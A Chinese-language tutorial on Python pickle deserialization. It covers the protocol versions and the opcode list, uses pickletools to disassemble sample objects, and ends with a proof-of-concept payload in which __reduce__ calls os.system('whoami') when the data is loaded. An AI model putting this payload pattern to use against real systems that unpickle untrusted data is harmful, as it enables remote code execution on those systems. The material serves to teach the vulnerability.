python反序列化和php反序列化類似,相當於把程序運行時產生的變量,字典,對象實例等變換成字符串形式存儲起來,以便後續調用,恢復保存前的狀態
python中反序列化的庫主要有兩個,pickle和cpickle,這倆除了運行效率上有區別外,沒什麼區別
序列化:pickle.dumps()將對象序列化為字符串、pickle.dump()將對象序列化後的字符串存儲為文件反序列化:pickle.loads()將字符串反序列化為對象、pickle.load()從文件中讀取數據反序列化
使用dumps()與loads()時可以使用protocol參數指定協議版本
協議有0,1,2,3,4,5號版本,不同的python版本默認的協議版本不同。這些版本中,0號是最可讀的,之後的版本為了優化加入了不可打印字符
協議是向下兼容的,0號版本也可以直接使用
pickle實際上是一門棧語言,它有不同的幾種編寫方式,通常我們人工編寫的話,是使用protocol=0的方式來寫。而讀取的時候python會自動識別傳入的數據使用哪種方式。
和傳統語言中有變量、函數等內容不同,pickle這種堆棧語言,並沒有“變量名”這個概念,所以可能有點難以理解。pickle的內容儲存在如下兩個位置中:
·stack 棧
·memo 一個列表,可以儲存信息
pickle的常用方法有
import pickle
a_list = ['a','b','c']
print(pickle.dumps(a_list,protocol=0))
pickle.loads() #對象反序列化
pickle.load() #對象反序列化,從文件中讀取數據
在挖掘反序列化漏洞之前,需要了解python反序列化的流程是怎樣的
直接分析反序列化出的字符串是比較困難的,我們可以使用pickletools幫助分析
import pickle
import pickletools
a_list = ['a','b','c']
a_list_pickle = pickle.dumps(a_list,protocol=0)
print(a_list_pickle)
# 優化一個已經被打包的字符串
a_list_pickle = pickletools.optimize(a_list_pickle)
print(a_list_pickle)
# 反匯編一個已經被打包的字符串
pickletools.dis(a_list_pickle)
指令集如下:(更具體可以查看pickletools.py)
MARK = b'(' # push special markobject on stack
STOP = b'.' # every pickle ends with STOP
POP = b'0' # discard topmost stack item
POP_MARK = b'1' # discard stack top through topmost markobject
DUP = b'2' # duplicate top stack item
FLOAT = b'F' # push float object; decimal string argument
INT = b'I' # push integer or bool; decimal string argument
BININT = b'J' # push four-byte signed int
BININT1 = b'K' # push 1-byte unsigned int
LONG = b'L' # push long; decimal string argument
BININT2 = b'M' # push 2-byte unsigned int
NONE = b'N' # push None
PERSID = b'P' # push persistent object; id is taken from string arg
BINPERSID = b'Q' # " " " ; " " " " stack
REDUCE = b'R' # apply callable to argtuple, both on stack
STRING = b'S' # push string; NL-terminated string argument
BINSTRING = b'T' # push string; counted binary string argument
SHORT_BINSTRING= b'U' # " " ; " " " " < 256 bytes
UNICODE = b'V' # push Unicode string; raw-unicode-escaped'd argument
BINUNICODE = b'X' # " " " ; counted UTF-8 string argument
APPEND = b'a' # append stack top to list below it
BUILD = b'b' # call __setstate__ or __dict__.update()
GLOBAL = b'c' # push self.find_class(modname, name); 2 string args
DICT = b'd' # build a dict from stack items
EMPTY_DICT = b'}' # push empty dict
APPENDS = b'e' # extend list on stack by topmost stack slice
GET = b'g' # push item from memo on stack; index is string arg
BINGET = b'h' # " " " " " " ; " " 1-byte arg
INST = b'i' # build & push class instance
LONG_BINGET = b'j' # push item from memo on stack; index is 4-byte arg
LIST = b'l' # build list from topmost stack items
EMPTY_LIST = b']' # push empty list
OBJ = b'o' # build & push class instance
PUT = b'p' # store stack top in memo; index is string arg
BINPUT = b'q' # " " " " " ; " " 1-byte arg
LONG_BINPUT = b'r' # " " " " " ; " " 4-byte arg
SETITEM = b's' # add key+value pair to dict
TUPLE = b't' # build tuple from topmost stack items
EMPTY_TUPLE = b')' # push empty tuple
SETITEMS = b'u' # modify dict by adding topmost key+value pairs
BINFLOAT = b'G' # push float; arg is 8-byte float encoding
TRUE = b'I01\n' # not an opcode; see INT docs in pickletools.py
FALSE = b'I00\n' # not an opcode; see INT docs in pickletools.py
對照理解
b'\x80\x03](X\x01\x00\x00\x00aX\x01\x00\x00\x00bX\x01\x00\x00\x00ce.'
0: \x80 PROTO 3 #標明使用協議版本
2: ] EMPTY_LIST #將空列表壓入棧
3: ( MARK #將標志壓入棧
4: X BINUNICODE 'a' #unicode字符
10: X BINUNICODE 'b'
16: X BINUNICODE 'c'
22: e APPENDS (MARK at 3) #將3號標志後的數據壓入列表
# 彈出棧中的數據,結束流程
23: . STOP
highest protocol among opcodes = 2
再來一個
import pickle
import pickletools
import base64
class a_class():
def __init__(self):
self.age = 114514
self.name = "QAQ"
self.list = ["1919","810","qwq"]
a_class_new = a_class()
a_class_pickle = pickle.dumps(a_class_new,protocol=3)
print(a_class_pickle)
# 優化一個已經被打包的字符串
a_list_pickle = pickletools.optimize(a_class_pickle)
print(a_class_pickle)
# 反匯編一個已經被打包的字符串
pickletools.dis(a_class_pickle)
b'\x80\x03c__main__\na_class\nq\x00)\x81q\x01}q\x02(X\x03\x00\x00\x00ageq\x03M\xe5\x07X\x04\x00\x00\x00nameq\x04X\x03\x00\x00\x00tmxq\x05X\x04\x00\x00\x00listq\x06]q\x07(X\x05\x00\x00\x00donotq\x08X\x06\x00\x00\x00givemeq\tX\x04\x00\x00\x00hopeq\neub.'
b'\x80\x03c__main__\na_class\nq\x00)\x81q\x01}q\x02(X\x03\x00\x00\x00ageq\x03M\xe5\x07X\x04\x00\x00\x00nameq\x04X\x03\x00\x00\x00tmxq\x05X\x04\x00\x00\x00listq\x06]q\x07(X\x05\x00\x00\x00donotq\x08X\x06\x00\x00\x00givemeq\tX\x04\x00\x00\x00hopeq\neub.'
0: \x80 PROTO 3
push self.find_class(modname,name);連續讀取兩個字符串作為參數,以\n為界
# 這裡就是self.find_class('__main__','a_class');
# 需要注意的版本不同,find_class函數也不同
2: c GLOBAL '__main__ a_class'
20: q BINPUT 0
# 向棧中壓入一個元組
22: ) EMPTY_TUPLE
# 大意為,該指令之前的棧內容應該為一個類(2行GLOBAL創建的類),類後為一個元組(22行壓入的TUPLE),調用cls.__new__(cls, *args)(即用元組中的參數創建一個實例,這裡元組實際為空)
23: \x81 NEWOBJ
24: q BINPUT 1
# 壓入一個新字典
26: } EMPTY_DICT
27: q BINPUT 2
# 一個標志
29: ( MARK
# 壓入unicode值
30: X BINUNICODE 'age'
38: q BINPUT 3
40: M BININT2 2021
43: X BINUNICODE 'name'
52: q BINPUT 4
54: X BINUNICODE 'tmx'
62: q BINPUT 5
64: X BINUNICODE 'list'
73: q BINPUT 6
75: ] EMPTY_LIST
76: q BINPUT 7
# double mark
78: ( MARK
79: X BINUNICODE 'donot'
89: q BINPUT 8
91: X BINUNICODE 'giveme'
102: q BINPUT 9
104: X BINUNICODE 'hope'
113: q BINPUT 10
# 將第78行mark後的值壓入到第75行的列表
115: e APPENDS (MARK at 78)
# 大意為將任意數量的鍵值對添加到現有字典中
# tack before: ... pydict markobject key_1 value_1 ... key_n value_n
# Stack after: ... pydict
116: u SETITEMS (MARK at 29)
# 通過__setstate__或更新__dict__完成構建對象(對象為我們在23行創建的)
# 如果對象具有__setstate__方法,則調用anyobject.__setstate__(參數)
# 如果無__setstate__方法,則通過anyobject.__dict__.update(argument)更新值
# 注意這裡可能產生變量覆蓋
117: b BUILD
# 彈出棧中的數據,結束流程
118: . STOP
highest protocol among opcodes = 2
ctf中常見的pickle反序列化,利用的方法大多是__reduce__
觸發__reduce__的指令碼為R
# pickletools.py 1955行
name='REDUCE',
code='R',
arg=None,
stack_before=[anyobject, anyobject],
stack_after=[anyobject],
proto=0,
doc="""Push an object built from a callable and an argument tuple.
The opcode is named to remind of the __reduce__() method.
Stack before: ... callable pytuple
Stack after: ... callable(*pytuple)
The callable and the argument tuple are the first two items returned
by a __reduce__ method. Applying the callable to the argtuple is
supposed to reproduce the original object, or at least get it started.
If the __reduce__ method returns a 3-tuple, the last component is an
argument to be passed to the object's __setstate__, and then the REDUCE
opcode is followed by code to create setstate's argument, and then a
BUILD opcode to apply __setstate__ to that argument.
If not isinstance(callable, type), REDUCE complains unless the
callable has been registered with the copyreg module's
safe_constructors dict, or the callable has a magic
'__safe_for_unpickling__' attribute with a true value. I'm not sure
why it does this, but I've sure seen this complaint often enough when
I didn't want to <wink>.
"""
只要在序列化中的字符串存在R指令,__reduce__方法就會被執行,無論正常程序中是否寫明了__reduce__方法
import pickle
import pickletools
import base64
class a_class():
def __init__(self):
self.age = 2021
self.name = "tmx"
self.list = ["donot","giveme","hope"]
def __reduce__(self):
return (__import__('os').system, ("whoami",))
a_class_new = a_class()
a_class_pickle = pickle.dumps(a_class_new,protocol=3)
print(a_class_pickle)
# 優化一個已經被打包的字符串
a_list_pickle = pickletools.optimize(a_class_pickle)
print(a_class_pickle)
# 反匯編一個已經被打包的字符串
pickletools.dis(a_class_pickle)
'''
b'\x80\x03cnt\nsystem\nq\x00X\x06\x00\x00\x00whoamiq\x01\x85q\x02Rq\x03.'
b'\x80\x03cnt\nsystem\nq\x00X\x06\x00\x00\x00whoamiq\x01\x85q\x02Rq\x03.'
0: \x80 PROTO 3
2: c GLOBAL 'nt system'
13: q BINPUT 0
15: X BINUNICODE 'whoami'
26: q BINPUT 1
28: \x85 TUPLE1
29: q BINPUT 2
31: R REDUCE
32: q BINPUT 3
34: . STOP
highest protocol among opcodes = 2
'''
把生成的payload拿到無__reduce__的正常程序中,命令仍然會被執行
import pickle
import pickletools
import base64
class a_class():
def __init__(self):
self.age = 2021
self.name = "tmx"
self.list = ["donot","giveme","hope"]
a_class_pickle = pickle.loads(b'\x80\x03cnt\nsystem\nq\x00X\x06\x00\x00\x00whoamiq\x01\x85q\x02Rq\x03.')
開擺了